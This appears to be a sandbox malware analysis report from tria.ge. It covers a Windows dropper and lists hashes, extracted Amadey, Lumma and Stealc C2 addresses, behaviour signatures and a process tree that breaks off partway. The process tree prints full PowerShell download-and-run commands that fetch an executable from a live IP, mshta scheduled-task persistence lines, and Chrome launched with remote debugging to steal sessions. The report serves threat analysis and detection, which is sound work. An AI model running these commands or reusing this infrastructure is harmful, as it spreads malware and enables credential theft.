Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    10/03/2025, 15:51

General

  • Target

    57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe

  • Size

    938KB

  • MD5

    afdfccd956ad7ac9e185bc503802ff22

  • SHA1

    9708fd1a5ee5b4728c67a6b2b5687e012dea98a3

  • SHA256

    57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700

  • SHA512

    1fe8a89524a2e35d2dd53550fcbccf24429a6c6e8be4d40e9e99daf735dafc505dbee08ae74d9cc2c58eef5517c7865428d955483904af7d37ed9ffd91666a70

  • SSDEEP

    24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8a4gu:CTvC/MTQYxsWR7a4g

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://absoulpushx.life/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

https://1sterpickced.digital/api

https://narisechairedd.shop/api

https://2.sterpickced.digital/api

https://defaulemot.run/api

https://featureccus.shop/api

https://zmrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://htardwarehu.icu/api

https://cjlaspcorne.icu/api

https://bugildbett.top/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • DCRat payload 4 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 25 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 24 IoCs
  • Suspicious use of SendNotifyMessage 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe
    "C:\Users\Admin\AppData\Local\Temp\57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2508
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn YRotqmaC08o /tr "mshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:468
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn YRotqmaC08o /tr "mshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2824
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'POFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2880
        • C:\Users\Admin\AppData\Local\TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE
          "C:\Users\Admin\AppData\Local\TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2620
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1132
            • C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe
              "C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2480
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1252
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1416
            • C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe
              "C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1812
              • C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe
                "C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3004
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 1036
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2472
            • C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe
              "C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2264
              • C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe
                "C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:2616
            • C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe
              "C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe"
              6⤵
              • Executes dropped EXE
              PID:2992
              • C:\Windows\System32\wscript.exe
                "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"
                7⤵
                • Blocklisted process makes network request
                • Downloads MZ/PE file
                • Loads dropped DLL
                PID:2948
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\F8617F1F15E53ADE2CC7B01D00F844AC\BE4CE3E771FFA0AFA6B3CA61DF9F4514.vbe" /f /rl highest
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:2252
                • C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
                  "C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf9
                  8⤵
                  • Executes dropped EXE
                  PID:1092
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAD6A3A1A21978000:00000000000000000000000000000000000000000000001CAD6A3DBD742BBFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                    9⤵
                    • Loads dropped DLL
                    PID:2032
                    • C:\Users\Admin\AppData\Local\Temp\OpenCL.pif
                      OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAD6A3A1A21978000:00000000000000000000000000000000000000000000001CAD6A3DBD742BBFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG
                      10⤵
                      • Executes dropped EXE
                      PID:2292
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                      10⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2960
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAE6B251EF52B4000:00000000000000000000000000000000000000000000001CAE6B28C247BF7FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                    9⤵
                    • Loads dropped DLL
                    PID:584
                    • C:\Users\Admin\AppData\Local\Temp\OpenCL.pif
                      OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAE6B251EF52B4000:00000000000000000000000000000000000000000000001CAE6B28C247BF7FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG
                      10⤵
                      • Executes dropped EXE
                      PID:1120
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"
                      10⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1100
            • C:\Users\Admin\AppData\Local\Temp\10167640101\db7e2fd40a.exe
              "C:\Users\Admin\AppData\Local\Temp\10167640101\db7e2fd40a.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2276
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn XICzGmanQz7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                PID:912
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn XICzGmanQz7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1684
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:884
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1356
                  • C:\Users\Admin\AppData\Local\TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE
                    "C:\Users\Admin\AppData\Local\TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:352
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10167650121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2264
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2748
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2648
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2732
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2580
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2996
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2652
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2824
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "6ycUEmagtJO" /tr "mshta \"C:\Temp\NUnXI0p8x.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2208
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\NUnXI0p8x.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2200
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2072
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1960
            • C:\Users\Admin\AppData\Local\Temp\10168010101\27264e0632.exe
              "C:\Users\Admin\AppData\Local\Temp\10168010101\27264e0632.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1696
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 1200
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2172
            • C:\Users\Admin\AppData\Local\Temp\10168020101\0dce80a750.exe
              "C:\Users\Admin\AppData\Local\Temp\10168020101\0dce80a750.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:3044
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                7⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1956
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7309758,0x7fef7309768,0x7fef7309778
                  8⤵
                    PID:2716
                  • C:\Windows\system32\ctfmon.exe
                    ctfmon.exe
                    8⤵
                      PID:2040
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:2
                      8⤵
                        PID:2304
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:8
                        8⤵
                          PID:1888
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:8
                          8⤵
                            PID:2348
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2144 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:1
                            8⤵
                            • Uses browser remote debugging
                            PID:2700
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2436 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:1
                            8⤵
                            • Uses browser remote debugging
                            PID:972
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2444 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:1
                            8⤵
                            • Uses browser remote debugging
                            PID:2504
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1136 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:2
                            8⤵
                              PID:2124
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                            7⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            PID:3536
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef59e9758,0x7fef59e9768,0x7fef59e9778
                              8⤵
                                PID:3548
                              • C:\Windows\system32\ctfmon.exe
                                ctfmon.exe
                                8⤵
                                  PID:3660
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1212 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:2
                                  8⤵
                                    PID:3712
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:8
                                    8⤵
                                      PID:3728
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:8
                                      8⤵
